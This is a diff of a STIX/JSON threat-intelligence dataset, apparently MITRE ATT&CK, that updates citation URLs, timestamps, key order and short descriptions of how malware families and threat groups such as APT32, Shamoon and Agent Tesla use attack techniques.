- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--28b97733-ef07-4414-aaa5-df50b2d30cc5",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2020-03-17T00:28:02.206Z",
+ "modified": "2020-04-21T23:09:31.867Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -100660,12 +101827,12 @@
"url": "https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf"
}
],
- "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--4189a679-72ed-4a89-a57c-7f689712ecf8",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--44090eb6-1166-4986-8583-60dcc8e69cc7",
@@ -100681,12 +101848,12 @@
"url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
}
],
- "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--17b40f60-729f-4fe8-8aea-cc9ee44a95d5",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--c848fcf7-6b62-4bde-8216-b6c157d48da0"
},
{
"id": "relationship--f5fee3da-a3ef-4a81-a70c-9660ab1fb3d6",
@@ -100712,7 +101879,7 @@
{
"id": "relationship--7e7d5aa9-6860-44fe-88b9-22a6b36162e2",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update.(Citation: Cybereason Cobalt Kitty 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has renamed a NetCat binary to kb-10233.exe to masquerade as a Windows update. [APT32](https://attack.mitre.org/groups/G0050) has also renamed a Cobalt Strike beacon payload to install_flashplayers.exe. (Citation: Cybereason Cobalt Kitty 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -100727,7 +101894,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
"type": "relationship",
- "modified": "2020-03-17T23:17:10.052Z",
+ "modified": "2020-06-29T17:55:52.939Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -100845,15 +102012,20 @@
"description": "Kaspersky Lab's Global Research & Analysis Team. (2018, October 10). MuddyWater expands operations. Retrieved November 2, 2018.",
"url": "https://securelist.com/muddywater/88059/",
"source_name": "Securelist MuddyWater Oct 2018"
+ },
+ {
+ "source_name": "ClearSky MuddyWater June 2019",
+ "url": "https://www.clearskysec.com/wp-content/uploads/2019/06/Clearsky-Iranian-APT-group-%E2%80%98MuddyWater%E2%80%99-Adds-Exploits-to-Their-Arsenal.pdf",
+ "description": "ClearSky. (2019, June). Iranian APT group \u2018MuddyWater\u2019 Adds Exploits to Their Arsenal. Retrieved May 14, 2020."
}
],
- "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to obtain a list of running processes on the system.(Citation: Securelist MuddyWater Oct 2018)",
+ "description": "[MuddyWater](https://attack.mitre.org/groups/G0069) has used malware to obtain a list of running processes on the system.(Citation: Securelist MuddyWater Oct 2018)(Citation: ClearSky MuddyWater June 2019)",
"id": "relationship--9f81120a-adde-47cc-95bc-cd8201eb0a11",
"source_ref": "intrusion-set--269e8108-68c6-4f99-b911-14b2e765dec2",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2019-06-28T15:30:58.761Z",
+ "modified": "2020-05-18T17:43:37.053Z",
"created": "2019-01-30T17:33:40.978Z"
},
{
@@ -101137,22 +102309,27 @@
{
"id": "relationship--73a53379-746e-46db-b101-1fc45df5e458",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d to execute the payload. [Shamoon](https://attack.mitre.org/software/S0140) can also spread via [PsExec](https://attack.mitre.org/software/S0029).(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December19 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December19 2018",
+ "description": "Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 19). Shamoon Attackers Employ New Tool Kit to Wipe Infected Systems. Retrieved May 29, 2020.",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-attackers-employ-new-tool-kit-to-wipe-infected-systems/"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.361Z",
+ "modified": "2020-06-15T14:22:34.198Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -101209,13 +102386,13 @@
"description": "Brumaghin, E., et al. (2018, October 15). Old dog, new tricks - Analysing new RTF-based campaign distributing Agent Tesla, Loki with PyREbox. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) encrypts the data with 3DES before sending it over the C2 server.(Citation: Talos Agent Tesla Oct 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can encrypt data with 3DES before sending it over to a C2 server.(Citation: Talos Agent Tesla Oct 2018)",
"id": "relationship--c48ff628-9276-492f-a61c-73989785b292",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--53ac20cd-aca3-406e-9aa0-9fc7fdc60a5a",
"type": "relationship",
- "modified": "2020-03-30T02:48:51.810Z",
+ "modified": "2020-05-28T23:41:03.883Z",
"created": "2019-01-29T18:44:05.137Z"
},
{
@@ -101422,15 +102599,20 @@
"description": "Horejsi, J., et al. (2018, March 14). Tropic Trooper\u2019s New Strategy. Retrieved November 9, 2018.",
"url": "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/",
"source_name": "TrendMicro Tropic Trooper Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro Tropic Trooper May 2020",
+ "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf",
+ "description": "Chen, J.. (2020, May 12). Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020."
}
],
- "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted configuration files.(Citation: TrendMicro Tropic Trooper Mar 2018)",
+ "description": "[Tropic Trooper](https://attack.mitre.org/groups/G0081) has encrypted configuration files.(Citation: TrendMicro Tropic Trooper Mar 2018)(Citation: TrendMicro Tropic Trooper May 2020)",
"id": "relationship--86333028-9eb1-44a3-9a5a-51fffe66f0e1",
"source_ref": "intrusion-set--56319646-eb6e-41fc-ae53-aadfa7adb924",
"relationship_type": "uses",
"target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
"type": "relationship",
- "modified": "2019-06-30T22:44:28.260Z",
+ "modified": "2020-05-21T12:59:00.609Z",
"created": "2019-01-29T20:17:49.354Z"
},
{
@@ -101468,12 +102650,12 @@
"url": "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
}
],
- "source_ref": "malware--2f1a9fd0-3b7c-4d77-a358-78db13adbe78",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--2f1a9fd0-3b7c-4d77-a358-78db13adbe78",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -102134,9 +103316,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -102148,7 +103330,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.760Z",
+ "modified": "2020-06-02T16:14:00.632Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -102288,16 +103470,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.646Z",
+ "modified": "2020-04-21T23:09:31.593Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -102462,7 +103644,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -102470,7 +103652,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
"type": "relationship",
- "modified": "2020-03-28T21:38:16.520Z",
+ "modified": "2020-06-22T17:54:16.030Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -102547,9 +103729,8 @@
"target_ref": "malware--b42378e0-f147-496f-992a-26a49705395b",
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
},
{
"url": "http://www.clearskysec.com/wp-content/uploads/2016/06/Operation-DustySky2_-6.2016_TLP_White.pdf",
@@ -102557,14 +103738,14 @@
"source_name": "DustySky2"
},
{
- "url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html",
+ "source_name": "FireEye Operation Molerats",
"description": "Villeneuve, N., Haq, H., Moran, N. (2013, August 23). OPERATION MOLERATS: MIDDLE EAST CYBER ATTACKS USING POISON IVY. Retrieved April 1, 2016.",
- "source_name": "FireEye Operation Molerats"
+ "url": "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html"
}
],
"description": "(Citation: DustySky)(Citation: DustySky2)(Citation: FireEye Operation Molerats)",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.156Z",
+ "modified": "2020-05-14T14:30:09.800Z",
"created": "2017-05-31T21:33:27.056Z"
},
{
@@ -102664,16 +103845,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.726Z",
+ "modified": "2020-04-21T23:09:31.579Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -102795,12 +103976,12 @@
"url": "https://www.cylance.com/content/dam/cylance/pdfs/reports/Op_Dust_Storm_Report.pdf"
}
],
- "source_ref": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--0db09158-6e48-4e7c-8ce7-2b10b9c0c039",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--ae9befd5-d8b7-4492-9b47-422a40d610cc",
@@ -102921,16 +104102,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.066Z",
+ "modified": "2020-05-12T22:13:17.027Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -103023,27 +104204,6 @@
"modified": "2020-03-19T22:02:49.077Z",
"created": "2017-12-14T16:46:06.044Z"
},
- {
- "id": "relationship--9ffda909-3503-47d8-9403-849a66eb9245",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--f9d6633a-55e6-4adc-9263-6ae080421a13",
- "relationship_type": "uses",
- "target_ref": "tool--fbd727ea-c0dc-42a9-8448-9e12962d1ab5",
- "external_references": [
- {
- "source_name": "Check Point Rocket Kitten",
- "url": "https://blog.checkpoint.com/wp-content/uploads/2015/11/rocket-kitten-report.pdf",
- "description": "Check Point Software Technologies. (2015). ROCKET KITTEN: A CAMPAIGN WITH 9 LIVES. Retrieved March 16, 2018."
- }
- ],
- "description": "(Citation: Check Point Rocket Kitten)",
- "type": "relationship",
- "modified": "2020-03-18T13:34:21.375Z",
- "created": "2018-04-18T17:59:24.739Z"
- },
{
"id": "relationship--f9600732-9116-4325-8073-28d81721b37a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
@@ -103142,16 +104302,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--03d7999c-1f4c-42cc-8373-e7690d318104",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.074Z",
+ "modified": "2020-05-12T22:13:16.854Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -103314,16 +104474,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--f72eb8a8-cd4c-461d-a814-3f862befbf00",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.151Z",
+ "modified": "2020-05-12T22:13:17.041Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -103369,18 +104529,23 @@
"source_name": "Fortinet Agent Tesla April 2018"
},
{
- "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018.",
+ "source_name": "Fortinet Agent Tesla June 2017",
"url": "https://www.fortinet.com/blog/threat-research/in-depth-analysis-of-net-malware-javaupdtr.html",
- "source_name": "Fortinet Agent Tesla June 2017"
+ "description": "Zhang, X. (2017, June 28). In-Depth Analysis of A New Variant of .NET Malware AgentTesla. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Bitdefender Agent Tesla April 2020",
+ "url": "https://labs.bitdefender.com/2020/04/oil-gas-spearphishing-campaigns-drop-agent-tesla-spyware-in-advance-of-historic-opec-deal/",
+ "description": "Arsene, L. (2020, April 21). Oil & Gas Spearphishing Campaigns Drop Agent Tesla Spyware in Advance of Historic OPEC+ Deal. Retrieved May 19, 2020."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim\u2019s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can capture screenshots of the victim\u2019s desktop.(Citation: Talos Agent Tesla Oct 2018)(Citation: DigiTrust Agent Tesla Jan 2017)(Citation: Fortinet Agent Tesla April 2018)(Citation: Fortinet Agent Tesla June 2017)(Citation: Bitdefender Agent Tesla April 2020)",
"id": "relationship--08109d9e-3258-4b9b-8e1d-ea90d05c18b9",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2020-03-18T19:25:30.289Z",
+ "modified": "2020-05-20T13:38:07.325Z",
"created": "2019-01-29T18:44:04.958Z"
},
{
@@ -103833,9 +104998,9 @@
"id": "relationship--0ef0077e-ee87-4e67-a466-2085a9148fc9",
"source_ref": "intrusion-set--d0b3393b-3bec-4ba3-bda9-199d30db47b6",
"relationship_type": "uses",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"type": "relationship",
- "modified": "2020-03-19T17:56:14.650Z",
+ "modified": "2020-06-23T19:52:35.801Z",
"created": "2019-01-31T02:01:45.707Z"
},
{
@@ -104056,12 +105221,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb491007.aspx"
}
],
- "source_ref": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--7fcbc4e8-1989-441f-9ac5-e7b6ff5806f1",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--c4d77981-d2e4-4a12-8e52-5b7464cdc8fd",
@@ -104192,12 +105357,12 @@
"url": "https://en.wikipedia.org/wiki/File_Transfer_Protocol"
}
],
- "source_ref": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--cf23bf4a-e003-4116-bbae-1ea6c558d565",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e"
},
{
"id": "relationship--12904c83-67ad-430f-96ae-20e9081c2b5d",
@@ -104234,12 +105399,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add"
},
{
"id": "relationship--7af9715f-b85c-4fc5-8ef8-5884c8144178",
@@ -104932,13 +106097,13 @@
"description": "Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware Variant. Retrieved November 5, 2018."
}
],
- "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) adds itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)",
+ "description": "[Agent Tesla](https://attack.mitre.org/software/S0331) can add itself to the Registry as a startup program to establish persistence.(Citation: Fortinet Agent Tesla April 2018)",
"id": "relationship--0ecaa94b-3ad8-4de5-9cf2-81069676cfa3",
"source_ref": "malware--e7a5229f-05eb-440e-b982-9a6d2b2b87c8",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2019-04-16T14:30:35.394Z",
+ "modified": "2020-05-28T23:41:03.880Z",
"created": "2019-01-29T18:44:04.954Z"
},
{
@@ -105112,7 +106277,7 @@
],
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
@@ -105121,7 +106286,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.291Z",
+ "modified": "2020-04-16T19:41:40.642Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -105641,12 +106806,12 @@
"url": "https://technet.microsoft.com/en-us/library/bb490968.aspx"
}
],
- "source_ref": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735"
},
{
"id": "relationship--c2e58b40-7644-4c0c-92ac-b63a565aca44",
@@ -105699,16 +106864,16 @@
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-16T17:46:57.155Z",
+ "modified": "2020-05-12T22:13:17.044Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -105931,7 +107096,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c",
"type": "relationship",
- "modified": "2020-02-12T20:27:07.904Z",
+ "modified": "2020-03-31T22:14:56.184Z",
"created": "2017-05-31T21:33:27.026Z"
},
{
@@ -106171,9 +107336,9 @@
],
"external_references": [
{
- "source_name": "F-Secure BlackEnergy 2014",
+ "url": "https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf",
"description": "F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016.",
- "url": "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf"
+ "source_name": "F-Secure BlackEnergy 2014"
},
{
"source_name": "Securelist BlackEnergy Nov 2014",
@@ -106185,7 +107350,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
- "modified": "2019-06-24T17:08:51.802Z",
+ "modified": "2020-06-02T16:14:00.911Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -106275,7 +107440,7 @@
{
"id": "relationship--52781f1e-4b91-4ff2-8f48-89e15bc40d42",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWRUNER](https://attack.mitre.org/software/S0184) may collect information the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)",
+ "description": "[POWRUNER](https://attack.mitre.org/software/S0184) may collect information on the victim's anti-virus software.(Citation: FireEye APT34 Dec 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -106290,28 +107455,33 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384",
"type": "relationship",
- "modified": "2020-03-17T02:14:56.003Z",
+ "modified": "2020-07-06T16:11:56.829Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
"id": "relationship--b258b8da-ddd2-4f0e-b5da-83a89f018d54",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
